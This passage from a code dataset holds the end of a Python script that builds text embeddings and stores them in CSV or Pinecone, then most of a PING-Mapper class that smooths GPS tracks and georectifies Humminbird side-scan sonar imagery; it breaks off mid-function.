{processed}/{total} rows\")\n return results\n\n# Function to generate CSV from dataframe\ndef generate_csv_embeddings(embeddings_dict: dict[tuple[str], list[float]]):\n filename = args.out\n print('Saving file to CSV...')\n\n # Convert the context_embeddings dictionary to a list of tuples, where each tuple is of the form (id, embedding)\n context_embeddings_list = [(k,) + tuple(v)\n for k, v in embeddings_dict.items()]\n\n # Create a DataFrame from the list of tuples\n column_names = ['id'] + [i for i in range(len(list(embeddings_dict.values())[0]))]\n df = pd.DataFrame(context_embeddings_list, columns=column_names)\n\n # Save the DataFrame to a CSV file\n df.to_csv(filename, index=False)\n print(f\"Done! Saved to {filename}\")\n\ndef find_or_create_index(index_name:str, namespace:str, recreate_index:bool=False):\n try:\n # Check for index\n pinecone.describe_index(index_name)\n print(f\"Index `{index_name}` found...\")\n except pinecone.core.client.exceptions.NotFoundException as e:\n # Index was not found, create it\n print(f\"Index `{index_name}` does not exist, creating...\")\n pinecone.create_index(index_name, dimension=PINECONE_DIMENSION_SIZE, metric=PINECONE_METRIC, pod_type=PINECONE_POD_TYPE)\n print(f\"Index created!\")\n\n # Get the index \n index = pinecone.Index(index_name)\n \n # If the index has been found, check if we need to remake it\n if recreate_index:\n print('Deleting vectors in namespace...')\n index.delete(delete_all=True, namespace=namespace)\n print(f\"Done\")\n return index\n\ndef insert_vectors(index, vectors, mode):\n if mode == \"upsert\":\n index.upsert(vectors)\n elif mode == \"replace\":\n index.replace(vectors)\n else:\n raise ValueError(\"Invalid value for --mode argument, must be 'upsert' or 'replace'\")\n\n# Function to upsert the embeddings to Pinecone\ndef generate_pinecone_embeddings(embeddings_dict:dict[tuple[str], list[float]]):\n index_name = args.pinecone_index\n namespace = args.pinecone_namespace\n recreate_index = args.pinecone_mode == \"replace\"\n\n print(f\"Generating Pinecone embeddings for index:{index_name}...\")\n pinecone.init(api_key=os.environ.get('PINECONE_API_KEY'), environment=PINECONE_REGION)\n index = find_or_create_index(index_name, namespace, recreate_index)\n\n print('Inserting vectors...')\n vectors = []\n for i, (id, embedding) in enumerate(embeddings_dict.items()):\n vectors.append((id, embedding, {}))\n if (i + 1) % PINECONE_BATCH_SIZE == 0:\n index.upsert(vectors=vectors, namespace=namespace)\n vectors = []\n if vectors:\n index.upsert(vectors=vectors, namespace=namespace)\n\ndef main():\n content_df = load_content_dataframe(args.file)\n\n # Generate the embeddings\n embeddings_dict = compute_doc_embeddings(df=content_df)\n\n if args.embedding_type == 'csv':\n generate_csv_embeddings(embeddings_dict=embeddings_dict)\n elif args.embedding_type == 'pinecone':\n generate_pinecone_embeddings(embeddings_dict=embeddings_dict)\n\n print('All done!')\n# Entry point\nif __name__ == \"__main__\":\n main()","repo_name":"ht2/gpt_content_indexing","sub_path":"create_embeddings.py","file_name":"create_embeddings.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"72"} +{"seq_id":"217445372","text":"# Part of PING-Mapper software\r\n#\r\n# Co-Developed by Cameron S. Bodine and Dr. Daniel Buscombe\r\n#\r\n# Inspired by PyHum: https://github.com/dbuscombe-usgs/PyHum\r\n#\r\n# MIT License\r\n#\r\n# Copyright (c) 2022-23 Cameron S. 
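# --- Editor's note: isolated sketch of the fixed-size batching loop that
# compute_doc_embeddings above walks over the dataframe; `fake_embed` stands in
# for the OpenAI API call and is invented for illustration. ---
def fake_embed(texts):
    return [[float(len(t))] for t in texts]  # placeholder, not a real embedding model

rows = ["alpha", "beta", "gamma", "delta", "epsilon"]
batch_size = 2
results = {}
for i in range(0, len(rows), batch_size):
    batch = rows[i:i + batch_size]  # the final slice may be shorter than batch_size
    for idx, emb in zip(range(i, i + len(batch)), fake_embed(batch)):
        results[idx] = emb
assert len(results) == len(rows)  # the last, short batch is still processed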
Bodine\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n\r\nfrom funcs_common import *\r\nfrom class_sonObj import sonObj\r\nfrom scipy.interpolate import splprep, splev\r\nfrom skimage.transform import PiecewiseAffineTransform, warp\r\nfrom rasterio.transform import from_origin\r\nfrom rasterio.enums import Resampling\r\nfrom PIL import Image\r\n\r\nfrom matplotlib import cm\r\n\r\nclass rectObj(sonObj):\r\n '''\r\n Python child class of sonObj() to store everything related to georectification\r\n of imagery from Humminbird sonar recordings. Since this is a child class of\r\n sonObj(), all attributes and functions provided in sonObj() are available to\r\n a rectObj() instance.\r\n\r\n ----------------\r\n Class Attributes\r\n ----------------\r\n * Alphabetical order *\r\n self.rangeExt : DataFrame\r\n DESCRIPTION - Pandas dataframe to store range extent.\r\n\r\n self.rect_wcr : bool\r\n DESCRIPTION - Flag indicating if rectified wcr data was exported.\r\n\r\n self.rect_wcp : bool\r\n DESCRIPTION - Flag indicating if rectified wcp data was exported.\r\n\r\n self.smthTrk : DataFrame\r\n DESCRIPTION - Pandas dataframe to store smoothed trackline.\r\n '''\r\n\r\n ############################################################################\r\n # Create rectObj() instance from previously created sonObj() instance #\r\n ############################################################################\r\n\r\n #=======================================================================\r\n def __init__(self,\r\n metaFile):\r\n '''\r\n Initialize an empty rectObj() class, child of sonObj() class. 
All sonObj()\r\n parameters initialized to `None` so that they can be loaded from a\r\n previously created pickle file.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n metaFile : str\r\n DESCRIPTION - Path to pickled sonObj() file containing sonObj() attribute\r\n values.\r\n EXAMPLE - metaFile = './PINGMapperTest/meta/B002_ss_port_meta.meta'\r\n\r\n -------\r\n Returns\r\n -------\r\n rectObj instance with sonObj attributes loaded.\r\n '''\r\n sonObj.__init__(self, sonFile=None, humFile=None, projDir=None, tempC=None, nchunk=None)\r\n\r\n metaFile = pickle.load(open(metaFile, 'rb')) # Load sonObj() pickle file into memory\r\n\r\n for attr, value in metaFile.__dict__.items(): # Store sonObj() attributes in self\r\n setattr(self, attr, value)\r\n\r\n if not hasattr(self, 'rect_wcp'):\r\n self.rect_wcp = False\r\n\r\n if not hasattr(self, 'rect_wcr'):\r\n self.rect_wcr = False\r\n\r\n return\r\n\r\n ############################################################################\r\n # Smooth GPS trackpoint coordinates #\r\n ############################################################################\r\n\r\n #=======================================================================\r\n def _interpTrack(self,\r\n df,\r\n dfOrig=None,\r\n dropDup=True,\r\n xlon='lon',\r\n ylat='lat',\r\n xutm='utm_e',\r\n yutm='utm_n',\r\n zU='time_s',\r\n filt=0,\r\n deg=3):\r\n '''\r\n Smooths 'noisy' ping trackpoints by completing the following:\r\n 1) Removes duplicate geographic coordinates;\r\n 2) Filter coordinates to reduce point density;\r\n 3) Fits n-degree spline to filtered coordinates;\r\n 4) Reinterpolate all input sonar records along the spline.\r\n\r\n Smoothed coordinates are reprojected into utm zone coordinates and course\r\n over ground (COG) is calculated.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n df : DataFrame\r\n DESCRIPTION - Pandas dataframe with geographic coordinates of sonar\r\n records.\r\n dfOrig : DataFrame : [Default=None]\r\n DESCRIPTION - Pandas dataframe with geographic coordinates of sonar\r\n records. If `None`, a copy of `df` will be used.\r\n dropDup : bool : [Default=True]\r\n DESCRIPTION - Flag indicating if coincident coordinates will be dropped.\r\n xlon : str : [Default='lon']\r\n DESCRIPTION - DataFrame column name for longitude coordinates.\r\n ylat : str : [Default='lat']\r\n DESCRIPTION - DataFrame column name for latitude coordinates.\r\n xutm : str : [Default='utm_e']\r\n DESCRIPTION - DataFrame column name for easting coordinates.\r\n yutm : str : [Default='utm_y']\r\n DESCRIPTION - DataFrame column name for northing coordinates.\r\n zU : str : [Default='time_s']\r\n DESCRIPTION - DataFrame column name used to reinterpolate coordinates\r\n along spline (i.e. 
determines spacing between coordinates)\r\n        filt : int : [Default=0]\r\n            DESCRIPTION - Every \`filt\` ping will be used to fit a spline.\r\n        deg : int : [Default=3]\r\n            DESCRIPTION - Indicates n-degree spline that will be fit to filtered\r\n            coordinates.\r\n\r\n        ----------------------------\r\n        Required Pre-processing step\r\n        ----------------------------\r\n        self.__init__()\r\n\r\n        -------\r\n        Returns\r\n        -------\r\n        Smoothed trackpoints in a Pandas DataFrame\r\n\r\n        --------------------\r\n        Next Processing Step\r\n        --------------------\r\n        self._getRangeCoords()\r\n        '''\r\n\r\n        lons = xlon+'s' # Name of smoothed longitude column in df\r\n        lats = ylat+'s' # Name of smoothed latitude column in df\r\n        es = xutm+'s' # Name of smoothed easting column in df\r\n        ns = yutm+'s' # Name of smoothed northing column in df\r\n\r\n        # Make copy of df to work on\r\n        if dfOrig is None:\r\n            dfOrig = df.copy()\r\n\r\n        # Check for duplicate zU values. If there are duplicate zU values, then\r\n        ## there will be pings that share smoothed lat/lon coordinates, which will\r\n        ## result in a COG == 0, messing up rectification.\r\n        zUvals = dfOrig[zU].to_numpy()\r\n        u, c = np.unique(zUvals, return_counts=True)\r\n        dups = len(u[c > 1]) > 0 # True if any zU value repeats\r\n\r\n        # Drop duplicate coordinates\r\n        if dropDup is True:\r\n            df.drop_duplicates(subset=[xlon, ylat], inplace=True)\r\n\r\n        # Extract every \`filt\` record, including last value\r\n        if (filt>0) and (len(df)>filt):\r\n            lastRow = df.iloc[-1].to_frame().T\r\n            dfFilt = df.iloc[::filt]\r\n            dfFilt = pd.concat([dfFilt, lastRow]).reset_index(drop=True)\r\n        else:\r\n            dfFilt = df.reset_index(drop=False)\r\n\r\n
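        # splprep below fits a parametric spline (x(u), y(u)) through the filtered\r\n        # points; splev then evaluates that spline at every ping's parameter value,\r\n        # so all pings get smoothed coordinates even though only every filt-th\r\n        # filtered point shaped the curve.\r\n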
        # Try smoothing trackline\r\n        x=dfFilt[xlon].to_numpy(dtype='float64') # Store longitude coordinates in numpy array\r\n        y=dfFilt[ylat].to_numpy(dtype='float64') # Store latitude coordinates in numpy array\r\n        if dups is True:\r\n            # Force unique zU value by multiplying time elapsed and record number\r\n            t = dfFilt[zU].to_numpy(dtype='float64') * dfFilt['record_num'].to_numpy(dtype='float64')\r\n            u_interp = dfOrig[zU].to_numpy(dtype='float64') * dfOrig['record_num'].to_numpy(dtype='float64')\r\n        else:\r\n            t=dfFilt[zU].to_numpy(dtype='float64') # Store parameter values in numpy array. Used to space points along spline.\r\n            u_interp = dfOrig[zU].to_numpy(dtype='float64') # Get all time elapsed OR record number values from unfiltered df\r\n\r\n        # Attempt to fix error\r\n        # https://stackoverflow.com/questions/47948453/scipy-interpolate-splprep-error-invalid-inputs\r\n        okay = np.where(np.abs(np.diff(x))+np.abs(np.diff(y))>0)\r\n        x = np.r_[x[okay], x[-1]]\r\n        y = np.r_[y[okay], y[-1]]\r\n        t = np.r_[t[okay], t[-1]]\r\n\r\n        # Check if enough points to interpolate\r\n        # If not, too many overlapping pings\r\n        if len(x) <= deg:\r\n            # return dfOrig[['chunk_id', 'record_num', 'ping_cnt', 'time_s', 'pix_m']]\r\n            return dfOrig[['chunk_id', 'record_num', 'ping_cnt', 'time_s']]\r\n\r\n        # Fit a spline to filtered coordinates and parameterize with time elapsed\r\n        try:\r\n            tck, _ = splprep([x,y], u=t, k=deg, s=0)\r\n        except:\r\n            # Time is messed up (negative time offset)\r\n            # Parameterize with record num instead\r\n            zU = 'record_num'\r\n            t = dfFilt[zU].to_numpy()\r\n            t = np.r_[t[okay], t[-1]]\r\n            tck, _ = splprep([x,y], u=t, k=deg, s=0)\r\n            u_interp = dfOrig[zU].to_numpy()\r\n\r\n        # u_interp = dfOrig[zU].to_numpy() # Get all time elapsed OR record number values from unfiltered df\r\n        x_interp = splev(u_interp, tck) # Use u_interp to get smoothed x/y coordinates from spline\r\n\r\n        # Debug check: report any parameter values that repeat (repeats would collapse pings)\r\n        u, indices, c = np.unique(u_interp, return_index=True, return_counts=True)\r\n        for val in zip(c, u, indices):\r\n            if val[0] > 1:\r\n                print(val)\r\n\r\n        # Store smoothed trackpoints in a dictionary\r\n        smooth = {'chunk_id': dfOrig['chunk_id'],\r\n                  'record_num': dfOrig['record_num'],\r\n                  'ping_cnt': dfOrig['ping_cnt'],\r\n                  'time_s': dfOrig['time_s'],\r\n                  'pix_m': self.pixM,\r\n                  lons: x_interp[0],\r\n                  lats: x_interp[1],\r\n                  'dep_m': dfOrig['dep_m']}\r\n\r\n        sDF = pd.DataFrame(smooth) # Convert dictionary to Pandas df\r\n\r\n        # Calculate smoothed easting/northing\r\n        e_smth, n_smth = self.trans(sDF[lons].to_numpy(), sDF[lats].to_numpy())\r\n        # Store in df\r\n        sDF[es] = e_smth\r\n        sDF[ns] = n_smth\r\n\r\n        # Calculate COG (course over ground; i.e. heading) from smoothed lat/lon\r\n        brng = self._getBearing(sDF, lons, lats)\r\n        # self._getBearing() returns n-1 values because last ping can't\r\n        ## have a COG value. We will duplicate the last COG value and use it for\r\n        ## the last ping.\r\n        last = brng[-1]\r\n        brng = np.append(brng, last)\r\n        sDF['cog'] = brng # Store COG in sDF\r\n\r\n        return sDF\r\n\r\n    #===========================================\r\n    def _getBearing(self,\r\n                    df,\r\n                    lon = 'lons',\r\n                    lat = 'lats'):\r\n        '''\r\n        Calculates course over ground (COG) from a set of coordinates. Since the\r\n        last coordinate pair cannot have a COG value, the length of the returned\r\n        array is n-1, where n == len(df).\r\n\r\n        ----------\r\n        Parameters\r\n        ----------\r\n        df : DataFrame\r\n            DESCRIPTION - Pandas dataframe with geographic coordinates of sonar\r\n            records.\r\n        lon : str : [Default='lons']\r\n            DESCRIPTION - DataFrame column name for longitude coordinates.\r\n        lat : str : [Default='lats']\r\n            DESCRIPTION - DataFrame column name for latitude coordinates.\r\n\r\n        ----------------------------\r\n        Required Pre-processing step\r\n        ----------------------------\r\n        Called from self._interpTrack()\r\n\r\n        -------\r\n        Returns\r\n        -------\r\n        Numpy array of COG values.\r\n\r\n        --------------------\r\n        Next Processing Step\r\n        --------------------\r\n        Return to self._interpTrack()\r\n        '''\r\n
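        # The bearing computed below is the standard forward-azimuth formula:\r\n        #   theta = atan2( sin(dLon)*cos(lat2), cos(lat1)*sin(lat2) - sin(lat1)*cos(lat2)*cos(dLon) )\r\n        # with all angles in radians, normalized to the range 0-360 degrees at the end.\r\n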
        # The COG calculation is done on numpy arrays for speed. Since\r\n        ## COG is calculated from one point to another (pntA -> pntB), we need\r\n        ## to store pntA values, beginning with the first value and ending at\r\n        ## second to last value, in one array and pntB values, beginning at second\r\n        ## value and ending at last value, in another array. We can then use\r\n        ## vector algebra to efficiently calculate COG.\r\n\r\n        # Prepare pntA values [0:n-1]\r\n        lonA = df[lon].to_numpy() # Store longitude coordinates in numpy array\r\n        latA = df[lat].to_numpy() # Store latitude coordinates in numpy array\r\n        lonA = lonA[:-1] # Omit last coordinate\r\n        latA = latA[:-1] # Omit last coordinate\r\n        pntA = [lonA,latA] # Store in array of arrays\r\n\r\n        # Prepare pntB values [1:n]\r\n        lonB = df[lon].to_numpy() # Store longitude coordinates in numpy array\r\n        latB = df[lat].to_numpy() # Store latitude coordinates in numpy array\r\n        lonB = lonB[1:] # Omit first coordinate\r\n        latB = latB[1:] # Omit first coordinate\r\n        pntB = [lonB,latB] # Store in array of arrays\r\n\r\n        # Convert latitude values into radians\r\n        lat1 = np.deg2rad(pntA[1])\r\n        lat2 = np.deg2rad(pntB[1])\r\n\r\n        diffLong = np.deg2rad(pntB[0] - pntA[0]) # Calculate difference in longitude then convert to radians\r\n        bearing = np.arctan2(np.sin(diffLong) * np.cos(lat2), np.cos(lat1) * np.sin(lat2) - (np.sin(lat1) * np.cos(lat2) * np.cos(diffLong))) # Calculate bearing in radians\r\n\r\n        db = np.degrees(bearing) # Convert radians to degrees\r\n        db = (db + 360) % 360 # Ensure degrees in range 0-360\r\n\r\n        return db\r\n\r\n    ############################################################################\r\n    # Apply offset to coordinates                                              #\r\n    ############################################################################\r\n\r\n    #===========================================\r\n    def _applyPosOffset(self, x_offset, y_offset):\r\n        '''\r\n        Apply offset to smoothed coordinates to account for GPS and transducer\r\n        offset.\r\n        '''\r\n        # Store necessary dataframe column names in variables\r\n        lons = 'lons'\r\n        lats = 'lats'\r\n        bearing = 'cog'\r\n        utm_es = 'utm_es'\r\n        utm_ns = 'utm_ns'\r\n\r\n        # Get smoothed trackline\r\n        sDF = self.smthTrk\r\n\r\n        #######################\r\n        # Go along x-axis first\r\n\r\n        R = 6371.393*1000 #Radius of the Earth in meters\r\n        if x_offset < 0:\r\n            rotate = 180\r\n        else:\r\n            rotate = 0\r\n\r\n        brng = (sDF['cog']+rotate) % 360\r\n        brng = np.deg2rad(brng)\r\n        d = abs(x_offset)\r\n\r\n        # Get lat/lon for origin of each ping, convert to numpy array\r\n        lat1 = np.deg2rad(sDF[lats]).to_numpy()\r\n        lon1 = np.deg2rad(sDF[lons]).to_numpy()\r\n\r\n        # Calculate position down boat x-axis\r\n        # Calculate latitude of the offset position\r\n        lat2 = np.arcsin( np.sin(lat1) * np.cos(d/R) +\r\n                          np.cos(lat1) * np.sin(d/R) * np.cos(brng))\r\n\r\n        # Calculate longitude of the offset position\r\n        lon2 = lon1 + np.arctan2( np.sin(brng) * np.sin(d/R) * np.cos(lat1),\r\n                                  np.cos(d/R) - np.sin(lat1) * np.sin(lat2))\r\n\r\n        lat2 = np.degrees(lat2)\r\n        lon2 = np.degrees(lon2)\r\n\r\n        sDF[lons] = lon2\r\n        sDF[lats] = lat2\r\n\r\n        ######################################\r\n        # Calculate position along boat y-axis\r\n        if y_offset > 0:\r\n            rotate = 90\r\n        else:\r\n            rotate = -90\r\n\r\n        brng = (sDF['cog']+rotate) % 360\r\n        brng = np.deg2rad(brng)\r\n        d = abs(y_offset)\r\n\r\n        # Get lat/lon for origin of each ping, convert to numpy array\r\n        lat1 = np.deg2rad(sDF[lats]).to_numpy()\r\n        lon1 = np.deg2rad(sDF[lons]).to_numpy()\r\n\r\n
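        # The y-axis leg below (like the x-axis leg above) uses the standard\r\n        # destination-point formula on a sphere, the same one cited in _getRangeCoords():\r\n        #   lat2 = asin( sin(lat1)*cos(d/R) + cos(lat1)*sin(d/R)*cos(brng) )\r\n        #   lon2 = lon1 + atan2( sin(brng)*sin(d/R)*cos(lat1), cos(d/R) - sin(lat1)*sin(lat2) )\r\n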
        # Calculate latitude of the offset position\r\n        lat2 = np.arcsin( np.sin(lat1) * np.cos(d/R) +\r\n                          np.cos(lat1) * np.sin(d/R) * np.cos(brng))\r\n\r\n        # Calculate longitude of the offset position\r\n        lon2 = lon1 + np.arctan2( np.sin(brng) * np.sin(d/R) * np.cos(lat1),\r\n                                  np.cos(d/R) - np.sin(lat1) * np.sin(lat2))\r\n\r\n        lat2 = np.degrees(lat2)\r\n        lon2 = np.degrees(lon2)\r\n\r\n        sDF[lons] = lon2\r\n        sDF[lats] = lat2\r\n\r\n        # Calculate easting and northing\r\n        e_smth, n_smth = self.trans(sDF[lons].to_numpy(), sDF[lats].to_numpy())\r\n        # Store in dataframe\r\n        sDF[utm_es] = e_smth\r\n        sDF[utm_ns] = n_smth\r\n        sDF = sDF.dropna() # Drop any NA's\r\n        self.smthTrk = sDF # Store df in class attribute\r\n\r\n        return\r\n\r\n    ############################################################################\r\n    # Calculate range extent coordinates                                       #\r\n    ############################################################################\r\n\r\n    #===========================================\r\n    def _getRangeCoords(self,\r\n                        flip = False,\r\n                        filt = 25):\r\n        '''\r\n        Humminbird SSS store one set of geographic coordinates where each ping\r\n        originates from (assuming GPS is located directly above sonar transducer).\r\n        In order to georectify the sonar imagery, we need to know geographically\r\n        where each ping terminates. The range (distance, length) of each\r\n        ping is not stored in the Humminbird recording, so we estimate\r\n        the size of one ping return (estimated previously in self._getPixSize)\r\n        and multiply by the number of ping returns for each ping to\r\n        estimate the range. Range coordinates for each ping are then\r\n        estimated using the range of each ping, the coordinates where the\r\n        ping originated, and the COG.\r\n\r\n        A spline is then fit to filtered range coordinates, the same as the trackpoints,\r\n        to help ensure no pings overlap, resulting in higher quality sonar imagery.\r\n\r\n        ----------\r\n        Parameters\r\n        ----------\r\n        flip : bool : [Default=False]\r\n            DESCRIPTION - Flip port and starboard sonar channels (if transducer\r\n            was facing backwards during survey).\r\n        filt : int : [Default=25]\r\n            DESCRIPTION - Every \`filt\` ping will be used to fit a spline.\r\n\r\n        ----------------------------\r\n        Required Pre-processing step\r\n        ----------------------------\r\n        self._interpTrack()\r\n\r\n        -------\r\n        Returns\r\n        -------\r\n        A Pandas DataFrame with range extent coordinates stored in self.rangeExt\r\n\r\n        --------------------\r\n        Next Processing Step\r\n        --------------------\r\n        self._rectSon()\r\n        '''\r\n        # Store necessary dataframe column names in variables\r\n        lons = 'lons'\r\n        lats = 'lats'\r\n        ping_cnt = 'ping_cnt'\r\n        ping_bearing = 'ping_bearing'\r\n        rlon = 'range_lon'\r\n        rlat = 'range_lat'\r\n        re = 'range_e'\r\n        rn = 'range_n'\r\n        range = 'range'\r\n        chunk_id = 'chunk_id'\r\n\r\n        self._loadSonMeta() # Load ping metadata\r\n        sonMetaDF = self.sonMetaDF\r\n\r\n        # Get smoothed trackline\r\n        if not hasattr(self, 'smthTrk'):\r\n            # if type(self.smthTrk) == str:\r\n            self.smthTrk = pd.read_csv(self.smthTrkFile)\r\n        else:\r\n            pass\r\n        sDF = self.smthTrk\r\n\r\n        ########################\r\n        # Calculate ping bearing\r\n        # Determine ping bearing. 
Ping bearings are perpendicular to COG.\r\n if self.beamName == 'ss_port':\r\n rotate = -90 # Rotate COG by 90 degrees to the left\r\n else:\r\n rotate = 90 # Rotate COG by 90 degrees to the right\r\n if flip: # Flip rotation factor if True\r\n rotate *= -1\r\n\r\n # Calculate ping bearing and normalize to range 0-360\r\n sDF[ping_bearing] = (sDF['cog']+rotate) % 360\r\n\r\n ############################################\r\n # Calculate range (in meters) for each chunk\r\n # Calculate max range for each chunk to ensure none of the sonar image\r\n ## is cut off due to changing the range setting during the survey.\r\n chunk = sDF.groupby(chunk_id) # Group dataframe by chunk_id\r\n\r\n # Old method\r\n # maxPing = chunk[ping_cnt].max() # Find max ping count for each chunk\r\n # New method to find maxPing based on most numerous ping count\r\n maxPing = []\r\n for name, group in sDF.groupby(chunk_id):\r\n rangeCnt = np.unique(group[ping_cnt], return_counts=True)\r\n pingMaxi = np.argmax(rangeCnt[1])\r\n maxPing.append(int(rangeCnt[0][pingMaxi]))\r\n # Convert maxPing i to pd series\r\n maxPing = pd.Series(maxPing)\r\n\r\n # pix_m = chunk['pix_m'].min() # Get pixel size for each chunk\r\n pix_m = self.pixM # Get pixel size for each chunk\r\n for i in maxPing.index: # Calculate range (in meters) for each chunk\r\n sDF.loc[sDF[chunk_id]==i, range] = maxPing[i]*pix_m\r\n\r\n ##################################################\r\n # Calculate range extent coordinates for each ping\r\n # Calculate range extent lat/lon using ping bearing and range\r\n # https://stackoverflow.com/questions/7222382/get-lat-long-given-current-point-distance-and-bearing\r\n R = 6371.393*1000 #Radius of the Earth in meters\r\n brng = np.deg2rad(sDF[ping_bearing]).to_numpy() # Convert ping bearing to radians and store in numpy array\r\n d = (sDF[range].to_numpy()) # Store range in numpy array\r\n\r\n # Get lat/lon for origin of each ping, convert to numpy array\r\n lat1 = np.deg2rad(sDF[lats]).to_numpy()\r\n lon1 = np.deg2rad(sDF[lons]).to_numpy()\r\n\r\n # Calculate latitude of range extent\r\n lat2 = np.arcsin( np.sin(lat1) * np.cos(d/R) +\r\n np.cos(lat1) * np.sin(d/R) * np.cos(brng))\r\n\r\n # Calculate longitude of range extent\r\n lon2 = lon1 + np.arctan2( np.sin(brng) * np.sin(d/R) * np.cos(lat1),\r\n np.cos(d/R) - np.sin(lat1) * np.sin(lat2))\r\n\r\n # Convert range extent coordinates into degrees\r\n lat2 = np.degrees(lat2)\r\n lon2 = np.degrees(lon2)\r\n\r\n # Store in dataframe\r\n sDF[rlon] = lon2\r\n sDF[rlat] = lat2\r\n\r\n # Calculate easting and northing\r\n e_smth, n_smth = self.trans(sDF[rlon].to_numpy(), sDF[rlat].to_numpy())\r\n # Store in dataframe\r\n sDF[re] = e_smth\r\n sDF[rn] = n_smth\r\n sDF = sDF.dropna() # Drop any NA's\r\n self.smthTrk = sDF # Store df in class attribute\r\n\r\n ##########################################\r\n # Smooth and interpolate range coordinates\r\n self._interpRangeCoords(filt)\r\n gc.collect()\r\n self._pickleSon()\r\n return #self\r\n\r\n #===========================================\r\n def _interpRangeCoords(self,\r\n filt = 25):\r\n '''\r\n This function fits a spline to the range extent coordinates. Before fitting\r\n the spline, overlapping pings are identified and removed to ensure spline\r\n does not have any loops. A spline is then fit for each individual chunk\r\n to avoid undesirable rectification effects caused by changing the range\r\n during a survey. 
The spline is used to reinterpolate range extent\r\n        coordinates, ensuring no overlap between pings.\r\n\r\n        ----------\r\n        Parameters\r\n        ----------\r\n        filt : int : [Default=25]\r\n            DESCRIPTION - Every \`filt\` ping will be used to fit a spline.\r\n\r\n        ----------------------------\r\n        Required Pre-processing step\r\n        ----------------------------\r\n        Called from self._getRangeCoords()\r\n\r\n        -------\r\n        Returns\r\n        -------\r\n        A Pandas dataframe stored in self.rangeExt with smoothed trackline and\r\n        range extent coordinates. This DataFrame is exported to .csv and overwrites\r\n        Trackline_Smth_BXXX.csv.\r\n\r\n        --------------------\r\n        Next Processing Step\r\n        --------------------\r\n        Returns smoothed range extent coordinates to self._getRangeCoords().\r\n        '''\r\n        # Store necessary dataframe column names in variables\r\n        rlon = 'range_lon'\r\n        rlons = rlon+'s'\r\n        rlat = 'range_lat'\r\n        rlats = rlat+'s'\r\n        re = 'range_e'\r\n        res = re+'s'\r\n        rn = 'range_n'\r\n        rns = rn+'s'\r\n\r\n        sDF = self.smthTrk # Load smoothed trackline coordinates\r\n        rDF = sDF.copy() # Make a copy to work on\r\n\r\n        # Work on one chunk at a time\r\n        for chunk, chunkDF in rDF.groupby('chunk_id'):\r\n            chunkDF.reset_index(drop=True, inplace=True)\r\n\r\n            # Extract every \`filt\` record, including last value\r\n            last = chunkDF.iloc[-1].to_frame().T\r\n            chunkDF = chunkDF.iloc[::filt]\r\n            chunkDF = pd.concat([chunkDF, last]).reset_index(drop=True)\r\n\r\n            idx = chunkDF.index.tolist() # Store ping index in list\r\n            maxIdx = max(idx) # Find last record index value\r\n\r\n            drop = np.empty((len(chunkDF)), dtype=bool) # Bool numpy array to flag which sonar records overlap and should be dropped\r\n            drop[:] = False # Prepopulate array w/ \`False\` (i.e. False==don't drop)\r\n\r\n            #########################################\r\n            # Find and drop overlapping sonar records\r\n            for i in idx: # Iterate each ping in filtered dataframe\r\n                if i == maxIdx: # Break loop once we reach the last ping\r\n                    break\r\n                else:\r\n                    if drop[i] != True: # If current ping flagged to drop, don't need to check it\r\n                        dropping = self._checkPings(i, chunkDF) # Find subsequent sonar records that overlap current record\r\n                        if maxIdx in dropping.keys(): # Make sure we don't drop last ping in chunk\r\n                            del dropping[maxIdx]\r\n                            dropping[i]=True # Drop current ping instead\r\n                        else:\r\n                            pass\r\n                        if len(dropping) > 0: # We have overlapping sonar records we need to drop\r\n                            for k, v in dropping.items(): # Flag records to drop\r\n                                drop[k] = True\r\n                        else:\r\n                            pass\r\n                    else:\r\n                        pass\r\n\r\n            ######################################################\r\n            # Drop all overlapping sonar records for current chunk\r\n            chunkDF = chunkDF[~drop]\r\n\r\n            rchunkDF = chunkDF.copy() # Make copy of df w/ no overlapping sonar records for current chunk\r\n            schunkDF = sDF[sDF['chunk_id']==chunk].copy() # Get original df for current chunk\r\n\r\n            #################################################\r\n            # Smooth and interpolate range extent coordinates\r\n            smthChunk = self._interpTrack(df=rchunkDF, dfOrig=schunkDF, xlon=rlon,\r\n                                          ylat=rlat, xutm=re, yutm=rn, filt=0, deg=1)\r\n\r\n            # Store smoothed range extent in output df\r\n            if 'rsDF' not in locals(): # If output df doesn't exist, make it\r\n                rsDF = smthChunk.copy()\r\n            else: # If output df exists, append results to it\r\n                rsDF = pd.concat([rsDF, smthChunk], axis=0).reset_index(drop=True)\r\n\r\n        ##################################################\r\n        # Join smoothed trackline to smoothed range extent\r\n        # sDF = sDF[['record_num', 'chunk_id', 
